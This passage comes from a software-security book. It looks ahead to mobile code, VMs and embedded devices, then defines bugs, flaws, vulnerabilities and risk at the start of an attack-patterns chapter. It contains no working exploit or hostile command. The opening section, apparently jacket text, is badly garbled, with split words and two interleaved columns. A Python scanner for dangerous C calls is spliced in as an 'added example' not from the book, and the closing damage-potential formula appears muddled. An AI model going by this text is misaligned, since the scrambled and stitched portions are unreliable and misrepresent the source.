e m be dde d sy st em s) : PDAs like t he Palm Pilot ar e b ecom ing I SBN: 0- 20 1- 786 95 -8 com mon place. New g en er at ions of t hese devices inclu de em bedded I nt er net capabilit y . Pages:sp 51rin 2 g's Treo r epr esent s t he conv erg en ce of phon e, PDA, and e- m ail syst em int o Hand one h ighly p ort ab le net w or ked device. These devices ar e sim p le, h and- h eld net w or k app lian ces t h at can be u sed t o car r y out m any secur it y - crit ical act iv it ies, includin g check ing e- m ail, ord er ing din ner, and buy ing st ocks. PDAs are oft en pr ogr am med r em ot ely and m ak e use of t he mob ile cod e par adigm t o r eceiv e and inst all new ogrsof amts. Alt hou gh ?t her e hav e tbeen soft wsof artewexp s of on PDAs o dat e, st andar How dproes w are br eak How do at ackerfsewm ake ar e loit br eak p urtpose? Why are d PDAs d o n ot t y pically in clu de a secur it y fr am ew ork . fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Log ical ly d ist ri but e d syst e m s: Com ponent - b ased soft w ar e and d ist r ibut ed syst em s Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d go hand in han d. Com p onent s, don e r ig ht , p rov ide log ical pieces of fu nct ionalit y t hat t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om can be pu t t og et h er in in t er est in g way s. Funct ionalit y of a comp let e sy st em is t hus at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . logically dist ribu t ed am on g a num b er of in t er conn ect ed com pon en t s. 
This sor t of must odular h elpf ul in ytou—and h e senseitt hwill at itcer enables sep arat concern s as w ell This m - h avedesign book is m ay shock t ainly educat e ion y ou.ofGet t ing bey ond t heas com par t m en t alizat ion , y et at t he sam e t im e dist rib ut ed sy st em s ar e com plicat ed an d scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t har d t o g et r ight . The m ost com m on d ist r ibu t ed sy st em s t od ay ar e geogr aphically colocat ed and oft en m ak e use of a sing le com m on pr ocessor. The Wind ow s fam ily of OSs, sof m ade of ploit hun dr of t com such as pDLLs, is a p r im e ex am ple. Window s is Why t w aruep ex w ed ill scon inueptonent o be as ser ious r oblem a log ically dist r ibut ed syst em . Un for t un at ely , com plexit y is t he f riend of soft w ar e exp loitnet ; t hu s, kdist r ib ut stanisms ems oftdo en nmak t hke job of exp loit in g sof t w ar e easier. When w or secur it yed m sy ech ot weor pat tier IAtntt ack r oduct onnsof . N ET: Micr osoft has j oined t he m obile code f r ay w it h t h e int r odu ct ion of . NET. Usually, wh en Micr osof t en t er s a m ark et in a ser iou s w ay , t his is a sig n t hat t he Rev seisengineer g r ead y t o b e exp loit ed. Java int r odu ced t he w or ld t o m obile code m arer ket mat u r e inand and m oder n n et wor k - cen t r ic sof t w ar e desig n. . NET is lik ely t o p lay a r eal r ole in m ob ile Classic serv soft w ar e anced secur it y m odels m eant t o p rot ect ag ainst code asat it t acks evolvag es.ainst Exp loit s er against adv m alicious mob ile cod e hav e been d iscussed f or y ear s. 
The em erg en ce of an ent ir e r ang e Sur pr ising t acks, rag ainst soft war of VM t echnatology unn in g clien fr omt VMs f or et iny 8- bit sm ar t car d pr ocessor s at on e end t o com plicat ed applicat ion ser ver VMs su ppor t ing sy st em s lik e J2EE m ean t hat one size Tech niqu es f or cr aft ing m aliciou s inpu t does n ot f it all f rom a secu rit y perspect ive. Much w or k r emain s t o b e done t o d et er m in e t he ttyp e ofical secur y mofech anisms t hat The echn detitails b uf fer ov er f loware s reasonable f or r esou rce- con st rain ed dev ices ( includin g J2 ME devices) . [ 16] I n t he meant im e, new VMs in t he r ang e are rip e for soft Rootwkar it se exp loit . [ 16]

r en tly doing Defense Advanced Resear ch Pr oj ects Agency ( DARPA) - suppor ted Ex p lo i t in g S oMcGr ft w aw a reisiscur f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak r esear ch on this pr oblem: DARPA gr ant no. F30602- 99- C-0172 , entitled An I n vest igat ion of soft w ar e. Ext en sible Syst em Secu rit y for High ly Resou rce- Con st rain ed Wir eless D evices.

Mobile code in use: The introduction of Java in 1995 was heralded with much hubbub about applets and mobile code. The problem was, mobile code was ahead of its time. As embedded Internet devices become more common, and many disparate systems are networked together, mobile code will come into its own. This becomes obvious when you consider that phones with JVMs are unlikely to be programmed through the phone's buttons. Instead, code will be written elsewhere and will be loaded into the phone as necessary. Although there are certainly critical security concerns surrounding mobile

code (see Securing Java [McGraw and Felten, 1998] for examples), demand for and use of mobile code will increase.

Web code and XML: Although the .com meltdown has lessened the hype surrounding e-business, the fact remains that Web-based systems really do compress business value chains in tangible ways. Business will continue to take advantage of Web-centric systems to make itself more efficient. XML, a simple markup language for data, plays a major role in data storage and manipulation in modern e-business systems. Web-based code comes with many security headaches. If your business uses a Web server to store mission-critical data, the security of that server (and any applications that run on it) gains in importance. Huge numbers of exploits in the early 2000s aim to compromise Web-based software.

Subscription services: The idea of paying for what you actually use is beginning to be applied to software as well as other digital content. This leads to an obvious set of security concerns, not the least of which is protecting the service or content (the target of the subscription) from being stolen. Protecting digital content is, according to computer science theory, an unsolved and unsolvable problem. Software exploits in this area abound, even though egregious laws such as the Digital Millennium Copyright Act (DMCA) aim to make such exploits illegal.


The future of software is already upon us. The current state of the trends identified here can be gleaned from digging into the following technologies, concepts, and ideas:

Advanced programming languages (especially those languages with properties of type safety)
Java, Scheme, Eiffel, ML (knowledge of lambda calculus is helpful)
Distributed computing
Containers
Building secure software
"Sandboxing" and encapsulation of executing code
WAP, iMode, 2.5G, 3G
Low-level networking

Medium-Term Future: 2005–2007

The short-term trends we discussed earlier are likely to evolve, resulting in a new set of salient ideas. Keep in mind that the further we peer into our crystal ball, the more likely we are to be wrong.
Special-purpose computational units: Devices that serve one and only one purpose are likely to emerge. Many such computational objects exist in telecommunications systems today.[17] The emergence of everyday devices with embedded software is interesting from a security perspective, especially if these devices are network enabled. The famed "Internet toaster" may become a reality, with the downside being a risk that your breakfast will be maliciously burned by a bad guy.

[17]

Note that there are counterexamples to this trend as well. For example, the only difference between classes of engines in some automobile product lines is the control software that changes engine performance parameters. This has led to the emergence of black market engine control code (used to soup things up). Such control software runs on standard computation platforms. Hacking control software in cars is commonly referred to as "chipping" the car.

Emergence of true objects: Objects in the physical world have form and function. Computational capability will be added to many "ordinary" objects to enhance their capabilities. Whether the new capability will take the form of a universal computer that accepts mobile code to determine its function is an open question. From a user perspective, "smart objects" will be the result. Software will play a major role in smart objects, and compromising such objects from a security perspective is likely to involve exploiting software.


.NET and Java: Systems involving VMs that run the same code on many diverse platforms will become much more common. (Sun's pithy way of putting this is "write once; run anywhere.") Since the introduction of Java in 1995, the JVM has taken the software world by storm. .NET is Microsoft's response to the Java phenomenon. Although VM technology allows for the use of advanced language-based security models, VMs are also a critical extensibility driver, and, as we discussed earlier, extensibility is dangerous.

Encapsulation of OS: OS encapsulation spearheaded by Java and .NET will continue to gain prominence. The proliferation of such platforms brings the idea of a VM that can really deliver "write once; run anywhere" capability closer to reality. Embedded devices with hardware implementations of VMs will become more common. The end game of this trend may well be "special-purpose" OSs that are built specifically for the device they support. An early example is the Palm OS. Because OS kernels typically run with privilege, the idea of privileged code and superuser (SUID) capability will be transferred to the device itself. This is a likely area for exploitation.

Widespread wireless and embedded systems: The concept of wireless networks will become deeply entrenched. Security concerns will grow as more widespread business applications come to include a wireless component.

Geographically distributed systems: Logically distributed systems such as Win32 will evolve into geographically distributed systems as special-purpose computational units come into play.
Once these systems begin to use the network as a communications medium, security concerns are raised. Transport-level security through cryptography can help to address these concerns, but "person-in-the-middle" attacks will become commonplace, as will timing-related attacks such as race conditions. Software exploitation in a geographically distributed system is interesting because the range of protections offered by various different hosts in the system is likely to vary. Because security is only as strong as the weakest link, part of an attack strategy will be to determine which of a number of distributed hosts is the weakest.

Adoption of outsourced computation: Computation may come to be more like electricity, with cycles available for the taking simply by "plugging something in." There are myriad security concerns invoked by the idea of outsourcing computation.[18] Questions like, How can you trust an answer? How can you protect knowledge about the problem you are solving from the host doing the computation? And how can you properly delegate resources and charge for use? will become commonplace. The impact on exploiting software will be large, because an attacker will need to determine not only how to attack, but where, and redundancy will be used to detect attacks.

[18]

This is, of course, reminiscent of the time-sharing systems from the 1960s and 1970s.

Software distribution: The idea of installing copies of an enterprise-grade program on every machine will begin to make less sense. Instead, software functionality will be delivered according to need, and users will be charged for the functions they use. The Application Service Provider (ASP) model of software licensing is likely to catch on. Software companies are preparing for this by changing the way they license and charge for software today. A new class of software attacks directed at surreptitiously stealing functions will evolve.

Mobile code taking over: Because of the pervasiveness of networking, all code in the

future will be mobile code. The term mobile code will fall out of use because it will be redundant. Language-based security models will take on more importance, and attacks against these kinds of security mechanisms (many of which were invented in the mid 1990s) will be seen in the wild.

Software practitioners interested in reacting to these trends and protecting code against exploit should learn as much as possible about the following ideas:

Object-oriented thinking
Understanding temporal implications
Distributed systems
Security in a hostile environment
Assume nothing
Programming languages
Simplicity
Fault injection
Privacy and control

Long-Term Future: 2008–2010

Now we move ourselves way out on a limb to make some predictions for the longer term future of software. Because software development and Internet time has led to a serious acceleration in software change, these predictions are likely to be completely wrong. Take these with a complete salt lick (not just a grain of salt).

True objects: The ultimate end at the intersection of computational objects, OS encapsulation, and geographically distributed computation will result in true objects becoming commonplace. Pens and paper will have application programming interfaces (APIs). Light switches will run code. Exploiting software will be more fun than ever.

Disappearance of the OS: After being "embraced" and encapsulated by the VM, the OS will begin to disappear.
Applications will get their own OS-like services from various components. Microsoft appears to agree, and it is easy to see why Microsoft is serious about .NET. McNealy's "network as computer" message will come true. This trend may make exploiting software harder. Today, with common monolithic platforms all sharing the same vulnerabilities in widespread use, there is a huge number of potential targets. In the future, picking targets is less likely to be so easy.

Computational services: The software distribution trend may evolve into a marketplace of computational services. These services may be sold "by the cycle" to programs that attach to them and request subcomputations.

Fabric of computation (ubiquity): Cycles may become as ubiquitous as air. Charging for cycles (and for CPUs) will no longer make sense.

Intelligent devices: Devices will not only be "smart" in the sense that they will have built-in software; artificial intelligence (AI) techniques will begin to be used in everyday devices. AI techniques will be pressed into service for security, reliability, and other emergent software properties.

All code mobile: Because the network is the computer, all code will be network based.

Location-based computation: Programs that react to where they are running will be common. Cryptographic algorithms that only work at certain global positioning satellite (GPS) coordinates will be widely used (not simply used by intelligence agencies like today). There will be programs that help human users by reminding them of things (and selling them things) based on physical proximity ("Don't forget to pick up milk."). WAP phones are leading the way to a certain extent, with location-sensitive advertising capabilities.


Self-organizing systems and emergent computation: Software that organizes itself to solve a problem may come to be. Using genetic algorithms, classic search methods, and biological metaphors, new kinds of software programs will come into being. Natural biological defenses (such as an immune system) will be copied by future software systems that wish to survive and thrive in a hostile environment. Self-organizing software may be harder to exploit than the barely cobbled-together code of today.


Some pie-in-the-sky fields will deeply influence the far future of software. These are likely to include

AI
Emergent systems and chaos theory
Automatic testing
Fault injection at component interfaces
Privacy
Interfaces

Ten Threads Emerge

Ten threads are woven throughout the previous predictions. They are

1. Disappearance of the OS
2. Mass adoption of wireless networks
3. Embedded systems and specialized computational devices
4. Truly distributed computation
5. Evolution of "objects" and component technology
6. Information fabric (ubiquity)
7. AI, knowledge management, and emergent computation
8. Pay by the byte (or cycle or function)
9. High-level design/programming tools
10. Location-based computation (peer to peer)

Because of the speed with which software has evolved in its relatively short life span, exploiting software is easy. Clearly, software evolution is not slowing down. If anything, this makes the job of creating software that behaves extremely hard, and gives software attackers plenty of working room.




What Is Software Security?

Making software behave is a process that involves identifying and codifying policy, then enforcing that policy with reasonable technology. There is no silver bullet for software security. Advanced technology for scanning code is good at finding implementation-level mistakes, but there is no substitute for experience. Advanced technology for securing applications is excellent for making sure that only approved software is executed, but it is not good at finding vulnerabilities in executables.

The late 1990s saw a boom in the security market as many "security solutions" were created and peddled. Money flowed. Yet, after years of expenditures on firewalls, antivirus products, and cryptography, exploits are on the rise. Vulnerabilities are increasing, as Figure 1-8 shows.

Figure 1-8. Software vulnerabilities as reported to CERT/CC. This number continues to rise.

In truth, firewalls do very little to protect networks. Intrusion detection products are riddled with errors and cause too many false positives, falling short of commercial expectations. Service companies do man-years of work, yet code is still hacked. Why is this the case? What is it that we have been spending money on all this time?

One major factor is that security has been sold as a product, a silver bullet solution: "Just buy this gizmo and all of your worries are taken care of, ma'am." You buy a red box, bolt it into a rack, and expect . . . what?
Most of the defensive mechanisms sold today do little to address the heart of the problem: bad software. Instead they operate in a reactive mode: Don't allow packets to this or that port. Watch out for files that include this pattern in them. Throw partial packets and oversize packets away without looking at them. Unfortunately, network traffic is not really the best way to approach the problem. The software that processes the packets that are allowed through is the problem. We can state in no uncertain terms that there are defects in the software you use every day, and this software does things like run your network. In fact, software plays an integral role in running most businesses today. We can try to keep bad people from getting access to our broken software, but this problem is hard, and is getting harder as the traditional barriers

between foci of information disappear. To move faster and operate in Internet time, we allow information to move faster. This means more services and an explosion of externally facing interfaces. This means more applications exposed on the outer edge of our networks. This means more software is exposed to potential attackers. Even home users are exposed, with more software showing up in homes, cars, and pockets. Everyone is at risk.




Conclusion

Exploiting software is an art and a challenge. First you have to figure out what a piece of code is doing, often by observing it run. Sometimes you can crash it and look at the pieces. Sometimes you can send it crazy input and watch it spin off into oblivion. Sometimes you can disassemble it, decompile it, put it in a jar, and poke it with experimental probes. Sometimes (especially if you are a "white hat") you can look at the design and spot architectural problems.

This book is about the art of exploiting software. In fact, in some sense this book is an offensive weapon. It is meant for hackers.[19] Script kiddies won't like this book because we don't simply give away "just add water" hacks.[20] This book provides little value to someone who simply wants to shoot guns on a computer network without knowing how guns are crafted. Instead, this book is about exploiting software systems or, to stretch our analogy, this book is about crafting guns by hand.

[19]

We use the term hacker in its traditional sense as defined in the Hacker's Dictionary: hacker: [originally, someone who makes furniture with an axe] n. 1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary. 2. One who programs enthusiastically (even obsessively) or who enjoys programming rather than just theorizing about programming. 3. A person capable of appreciating {hack value}. 4. A person who is good at programming quickly. 5. An expert at a particular program, or one who frequently does work using it or on it, as in "a Unix hacker." (Definitions 1 through 5 are correlated, and people who fit them congregate.) 6. An expert or enthusiast of any kind. One might be an astronomy hacker, for example. 7. One who enjoys the intellectual challenge of creatively overcoming or circumventing limitations. 8. [deprecated] A malicious meddler who tries to discover sensitive information by poking around. Hence "password hacker," "network hacker." See {cracker}. Available at http://www.mcs.kent.edu/docs/general/hackersdict/.

[20]

The term script kiddie is used to describe people who exploit computers using canned scripts, often created and distributed by others. Most script kiddies don't care how hacks work, just that they do work. Script kiddie is a derogatory comment, used to connote a person who has no real skills and leverages the work of other malicious hackers in the same way that a child might maliciously shoot a loaded gun. This book is not for script kiddies.

Software systems are, for the most part, proprietary, complicated, and custom made. This is why exploiting software is not a trivial undertaking. This is why a book like this is required, and we may only be able to scratch the surface.

This is a dangerous book, but the world is a dangerous place. Knowing more serves to protect you. Some people may criticize the release of this information, but our philosophy is that keeping secrets and fostering obscurity only hurts us all in the end. We maintain that putting books like these into the hands of the good guys will help to relegate a large number of common software security problems to the dustbin of history.

Chapter 2. Attack Patterns

One very real problem in computer security is the lack of commonly accepted terminology. Software security is no exception. Confusion by the popular press (which jumps at the chance to cover computer security issues) doesn't help. Nor does intentional misuse of terms by unscrupulous vendors trying to con you into buying their wares. In this section we'll informally define some terms that are used throughout the book. Some people may not agree with the way we're defining and using terms. Suffice it to say, our aim is clarity and consistency, and we think carving up the space our way makes sense for this discussion.

The first and most important definition is the target. Half the fun of exploiting software is picking your target. A software program that is under active attack, either remotely or locally, is called target software.

A target could be a server on the Internet, a telephone switch, or an isolated system that controls antiaircraft capability. To attack a target, it must be analyzed for vulnerabilities. Sometimes this is called risk assessment. If a high-risk vulnerability is discovered, it is ripe for exploitation. Vulnerability is not an exploit, but it is necessary for an exploit.

Software produces output. When testing, we observe software output to determine whether a fault has resulted in a failure. The more output provided by the software, the easier it is to detect faulty internal states and so forth. Observability is the probability that a failure will be noticeable in the output space.[1] The greater the observability, the easier it is to test a given piece of software. Software that produces no external output has no way to indicate a failure. A highly observable program might be one that has embedded debug output capability. A program that normally has low observability can be altered using a debugger to provide high observability. This would be the case if a data flow tracer were attached to the target, for example.

[1] For more information on the importance of observability and testing, see Software Fault Injection [Voas and McGraw, 1999].

Exploiting software encompasses the idea of observability, especially when we think about remote exploits. Throughout the book we discuss a number of techniques for improving observability. The basic idea is to gather as much information about a program's possible internal states as possible, both statically while it is being constructed and dynamically while it is running.

A Taxonomy

To measure risk in a system, vulnerabilities must be identified. One basic problem is that software vulnerabilities remain, for the most part, uncategorized and unidentified. Some basic science exists, but it is sketchy and dated. The good news is that during the last few years, a large body of specific software exploits have been identified, discussed, and publicized in various parts of the software community.

Two common collections of vulnerabilities include the bugtraq mailing list, where many exploits are first publicly discussed (http://www.bugtraq.com), and the CVE, where scientists and academics catalog vulnerabilities. Note that in the early 2000s, bugtraq became a commercial enterprise now exploited by Symantec to load their proprietary databases (which they happily rent to subscribers). The CVE, administered by Mitre, is another attempt to collect bug and flaw data in one place. The problem with the CVE is that it lacks much in the way of categorization.

The two forums we mention do begin to allow researchers to ascertain that certain software bugs commonly occur in many diverse products. There are, after all, a number of general problems in software. Although two software products may suffer from a particular instance of a buffer overflow bug, taken together with other instances, a general class of problems can be defined. In many respects, a buffer overflow looks the same no matter which software product it occurs in.

In our taxonomy, vulnerabilities (both bugs and flaws) are grouped together by central characteristics and give rise to particular attack patterns. This is based on the following premise: Related programming errors give rise to similar exploit techniques. Thus, we aim to cover the generic problems of software rather than specific, known vulnerabilities.[2] A general classification provides a framework that can be used when auditing large software systems for vulnerabilities to understand and assess results. Such a framework can help an auditor locate specific types of software problems. Of course, such information is useful both in defending systems and in attacking them.

[2] We will, of course, provide plenty of real examples throughout the text.

Bugs

A bug is a software problem. Bugs may exist in code and may never be executed. Although the term bug is applied quite generally by many software practitioners, we reserve use of the term to encompass fairly simple implementation problems. For example, misusing strcpy() in C and C++ in such a way that a buffer overflow condition exists is a bug. For us, bugs are implementation-level problems that can be easily "squashed." Bugs can exist only in code. Designs do not have bugs. Code scanners are great at finding bugs.

Flaws

A flaw is also a software problem, but a flaw is a problem at a deeper level. Flaws are often much more subtle than simply an off-by-one error in an array reference or the use of a dangerous system call. A flaw is instantiated in software code but is also present (or absent!) at the design level. For example, several classic flaws exist in error handling and recovery systems that fail in an insecure fashion. Another example is exposure to cross-site scripting attacks through poor design. Flaws may exist in software and may never be exploited.

Vulnerabilities

Bugs and flaws are vulnerabilities. A vulnerability is a problem that can be exploited by an attacker. There are many kinds of vulnerability. Computer security researchers have created taxonomies of vulnerabilities.[3]

[3] Ivan Krsul and Carl Landwehr are two scientists who have studied vulnerabilities and have built taxonomies. See Krsul [1998] and Landwehr et al. [1993] for more information.

Security vulnerabilities in software systems range from local implementation errors (e.g., use of the gets() function call in C/C++), through interprocedural interface errors (e.g., a race condition between an access control check and a file operation), to much higher design-level mistakes (e.g., error handling and recovery systems that fail in an insecure fashion, or object-sharing systems that mistakenly include transitive trust issues[4]).

[4] A transitive trust issue may occur when an object is shared with an agent that may then go on to share the object further (in a manner that can't be controlled by the original granter). If you dole out a secret to somebody, she may choose to share it, even if you don't want her to.

Attackers generally don't care whether a vulnerability is the result of a flaw or a bug, although bugs tend to be easier to exploit. Some vulnerabilities can be directly and completely exploited; others only provide a toehold for a more complex attack. Vulnerabilities can be defined in terms of code. The more complex a vulnerability, the more code must be examined to detect it. Sometimes just looking at code doesn't work though. In many cases, a higher level description of what's going on than is available in code is necessary. In many cases, a design description at a whiteboard level is necessary. Other times, detail regarding the execution environment must be known. Suffice it to say that there is a significant difference between trivial program errors (bugs) and architectural flaws. Trivial errors can often be fixed in a single line of code, whereas design flaws require a redesign that almost always touches multiple areas.

For example, we can usually determine that a call to gets() in a C/C++ program can be exploited in a buffer overflow attack without knowing anything about the rest of the code, its design, or anything about the execution environment. To exploit a buffer overflow in gets(), the attacker enters malicious text to a standard program input location. Hence, a gets() vulnerability can be detected with good precision using a very simple lexical analysis.

More complex vulnerabilities involve interactions among more than one location in the code. Precisely detecting race conditions, for example, depends on more than simply analyzing an isolated line of code. It may depend on knowing about the behavior of several functions, understanding sharing among global variables, and having knowledge of the OS providing the execution environment.

Because attacks are becoming more sophisticated, the notion of what kind of vulnerabilities actually matter is constantly changing. Timing attacks are now common, whereas only a few years ago they were considered exotic. Similarly, two-stage buffer overflow attacks involving the use of trampolines were once the domain of software scientists, but are now used in 0day exploits.
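An added example, not code from the book, of the contrast just drawn: a constructed, deliberately naive lexical scanner in Python reports gets() and strcpy() calls in constructed C source line by line, while a constructed access()/open() check-then-use race in the same style yields no findings, because that problem lives in the interaction between two calls rather than in any single line.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Added example, not from the book. Functions whose mere presence in C
# source is an implementation-level bug in the sense the chapter uses.
DANGEROUS_CALLS = {
    "gets": "unbounded read into a caller-supplied buffer; no safe use",
    "strcpy": "unbounded copy; overflows when source exceeds destination",
}

# A call is the bare identifier followed by '('. The lookbehind keeps
# fgets() and strncpy() from being reported as gets() and strcpy().
CALL_RE = re.compile(
    r"(?<![A-Za-z0-9_])(" + "|".join(DANGEROUS_CALLS) + r")\s*\("
)


@dataclass(frozen=True)
class Finding:
    line: int      # 1-based line number in the scanned source
    func: str      # the dangerous function that was called
    reason: str    # why its presence is reported


def strip_comments(source: str) -> str:
    """Blank out /* */ and // comments, keeping newlines so that line
    numbers survive. Naive on purpose: string literals are not parsed."""
    def blank(m: re.Match) -> str:
        return "\n" * m.group(0).count("\n")
    source = re.sub(r"/\*.*?\*/", blank, source, flags=re.S)
    return re.sub(r"//[^\n]*", "", source)


def scan_c_source(source: str) -> list[Finding]:
    """Lexical scan: every line is judged on its own, with no knowledge of
    the rest of the program, its design, or its execution environment."""
    findings: list[Finding] = []
    for lineno, line in enumerate(strip_comments(source).splitlines(), 1):
        for m in CALL_RE.finditer(line):
            func = m.group(1)
            findings.append(Finding(lineno, func, DANGEROUS_CALLS[func]))
    return findings


# Constructed sample 1: bugs that are visible on a single line of code.
BUGGY_SOURCE = """\
#include <stdio.h>
#include <string.h>
int main(void) {
    char name[64];
    /* gets(name); -- old version, commented out, must not be reported */
    gets(name);                 /* bug: unbounded read */
    char copy[32];
    strcpy(copy, name);         /* bug: name may exceed copy */
    return 0;
}
"""

# Constructed sample 2: a race between an access check and a file
# operation. access() and open() are each unremarkable on their own; the
# problem is the window between them, during which the path can be
# re-pointed at a different file. No single line carries the defect, so a
# line-by-line lexical scan reports nothing.
RACY_SOURCE = """\
#include <fcntl.h>
#include <unistd.h>
int open_if_allowed(const char *path) {
    if (access(path, R_OK) != 0)
        return -1;
    return open(path, O_RDONLY);  /* same path, resolved a second time */
}
"""

if __name__ == "__main__":
    for f in scan_c_source(BUGGY_SOURCE):
        print(f"line {f.line}: {f.func}() -- {f.reason}")
    print("findings in race sample:", scan_c_source(RACY_SOURCE))  # []
```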

Design Vulnerabilities

Design-level vulnerabilities carry this trend further. Unfortunately, ascertaining whether a program has design-level vulnerabilities requires great expertise. This makes finding design-level flaws not only hard to do, but particularly hard to automate. Design-level problems appear to be prevalent and are at the very least a critical category of security risk in code. Microsoft reports that around 50% of the problems uncovered during the "security push" of 2002 were design-level problems.[5] Clearly, more attention must be paid to design problems to address software security risks properly.

[5] Michael Howard, personal communication.

Consider an error handling and recovery system. Failure recovery is an essential aspect of security engineering. But it's also complicated, requiring interaction between failure models, redundant designs, and defense against denial-of-service attacks. In an object-oriented program, understanding whether an error handling and recovery system is secure involves ascertaining a property or properties spread throughout a multitude of classes that are themselves spread throughout the design. Error detection code is usually present in each object and method, and error-handling code is usually separate and distinct from the detection code. Sometimes exceptions propagate up to the system level and are handled by the machine running the code (e.g., Java 2 VM exception handling). This makes it quite difficult to determine whether a given error handling and recovery design is secure. This problem is exacerbated in transaction-based systems commonly used in commercial e-commerce solutions, in which functionality is distributed among many different components running on several servers.

Other examples of design-level problems include object sharing and trust issues, unprotected data channels (both internal and external), incorrect or missing access control mechanisms, lack of auditing/logging or incorrect logging, ordering and timing errors (especially in multithreaded systems), and many others. For more on design problems in software and how to avoid them, see Building Secure Software [Viega and McGraw, 2001].


An Open-Systems View

Building a taxonomy of software vulnerabilities is not a new idea. However, the few published approaches are outdated, and in general they fail to take a systemwide view of the problem. The tradition of building fault taxonomies often attempts to separate coding faults and "emergent faults" (those related to configuration and so forth), and treat them as separate, independent problems [Krsul, 1998].[6] The problem is that software risk can only be measured and assessed relative to a particular environment. This is because, in some cases, a potentially fatal attack ultimately poses no risk if the firewall successfully blocks it. Although a given piece of target software may itself be exploitable, the surrounding environment may protect it from harm (if a firewall gets lucky or an intrusion detection system catches an attack before any damage is done). Software is always part of a larger system of connected hardware, language technologies, and protocols. The environment issue is a double-edged sword, however, because many times the environment has a negative impact on software risk.

[6] The 1978 Protection Analysis study (called PA) and the 1976 RISOS study are early attempts at vulnerability classification.

The concept of "open systems" was first introduced in thermodynamics by von Bertalanffy.[7] The fundamental concept is that almost every technical system exists as part of a larger whole, and all the components are in a state of constant interaction. As a result, risk analysis has to consider the system at many levels: both superset and subset approaches. Some approaches for measuring software risk may not consider the environment as an essential part of the system, but risk cannot be measured out of context.

[7] To learn about Ludwig von Bertalanffy, go to http://www.isss.org/lumLVB.htm.

A classic example of an environmental effect is demonstrated by taking a program that has been successfully run with no security problems for years on a proprietary network and putting it on the Internet. The risks change, immediately and radically. For reasons like these, it makes little sense to consider code separate from any knowledge about the firewall or the business context in which the software will operate. Likewise it doesn't make sense to treat intrusion detection as an atomic network-level component divorced from the software that should be monitored. The fact is, software communicates over networks, and simple configuration settings can leave gaping security holes. Then again, proper firewall settings can sometimes choke off an attack that would otherwise wipe out a Web server.

In the end, separating code from the environment that it ultimately runs in turns out to be an artificial and misleading way of drawing a boundary in the system. In fact, such boundaries end up being of little real use. The complicating factor is that a system can be broken down into many hierarchical components of varying degrees of detail. A system viewed this way is a collection of many components or objects existing at myriad levels. Each piece of software in a system can likewise be viewed as a collection of many components or objects at different levels. At almost any level of granularity, these objects communicate with each other.

Modern systems are complex and involve interactions at many different levels. The upshot of all this is that the standard Tower-of-Hanoi-like conception of "stacked" applications (Figure 2-1) is very misleading. High-level applications call directly into very low-level OS constructs (even at the BIOS level) more often than many people think. So instead of a nice, clean, organized communication hierarchy with everything neatly calling only its "immediately surrounding" levels, almost everything can communicate with almost everything else on all sorts of disjoint levels. This makes building a protection domain somewhat tricky, if not nigh on impossible. Groups and domains can exist around any set of objects, and ultimately any object involves both code and configuration. Ultimately, environment really matters, and trying to treat code separate from the environment is doomed to fail.

Figure 2-1. A typical conceptual view of software applications (App) as nested hierarchical structures. The reality is that applications are not as nicely "stacked" as they appear to be here. This figure was created by Ed Felten of Princeton University.




Most security books focus only on the environment around software. They talk about fixing security problems at the router, the firewall, or by installing intrusion detection software. Only recently (in 2001) were the first books dedicated solely to developing secure software released (Building Secure Software by Viega and McGraw [2001], and Writing Secure Code by Michael Howard and David LeBlanc [2002]).

We find it useful to divide approaches into two distinct subfields: software security and application security.

Software security defends against software exploit by building software to be secure in the first place, mostly by getting the design right (which is hard) and avoiding common mistakes (which is easy). Issues critical to this subfield include: software risk management, programming languages and platforms, auditing software, designing for security, security flaws (buffer overflows, race conditions, access control and password problems, randomness, cryptographic errors, and so on), and testing for security. Software security is mostly concerned with designing software to be secure, making sure that software is secure, and educating software developers, architects, and users.

Application security defends against software exploit in a post facto way, after development is complete. Application security technology enforces reasonable policy about the kinds of things that can run, how they can change, and what the software does as it is running. Issues critical to this subfield include sandboxing code, protecting against malicious code, locking down executables, monitoring programs as they run, enforcing software use policy with technology, and dealing with extensible systems.

Note that both of these subfields must be considered when exploiting software.

Risk

By giving particular sorts of vulnerabilities a name, we can begin to attribute risk levels to these vulnerabilities. Once a risk is associated with a named software bug or flaw, an enterprise can calculate where budgets need to be allocated to reduce risk. On the other hand, an attacker can use the same data to calculate the likelihood of leveraging the most "bang for the bug." Clearly, some vulnerabilities cost less to exploit, just as some vulnerabilities cost less to mend.

Risk describes the likelihood that a given activity or combination of activities will lead to a software or system failure and, as a result, unacceptable resource damage will occur. To some degree, all activities expose software to potential faulty behavior. The level of exposure may vary depending on the reliability of the software, the amount of QA testing performed against the software, and the runtime environment of the software.

Flaws and bugs lead to risk; however, risks are not exploits. Risks capture the probability that a flaw or a bug will be exploited (our view is that high, medium, and low seem to work better as parameters for this than exact numbers). Risks also capture the potential damage that will occur. A very high risk is not only likely to happen, but is also likely to cause great harm. Risks can be managed by technical and nontechnical means. Software risk management takes into account software risks and attempts to manage the risks appropriately given a particular situation.

What follows is an abbreviated treatment for measuring software risk in an environment. Note that unlike some approaches, our approach does not take into account a deep understanding of the attacker—only the target software. We ignore the problem of categorizing and describing potential attackers in this book. Other books provide a reasonable treatment of assessing the threat profiles of attackers [Denning, 1998; Jones et al., 2002]. The equation we present here is meant to measure damage to software assuming that a capable attacker exists. Of course, if there are no capable attackers, then there is no risk.

Damage Potential

In our model, if the target software is exploitable and the firewall does nothing to protect it from attack, the result is extreme risk. It is important to understand that risk in this sense amounts only to the risk that the software will fail. We do not attempt to measure the value or the cost of that failure. In other words, we don't tell you how much your stolen database was worth. True risk assessment must measure the cost of a failure. In this case we take the first step toward classifying risk—gathering the information about a potential software failure but not calculating asset value, potential cascading failures, and damage control.

Given our definitions, the equation for damage potential is

Attack Potency (given) ranging from 1 to 10
x
Target Exposure (measure or assume 100%) from 0 to 1.0
=
Damage Potential (result is in the range 0 to 10) x 10

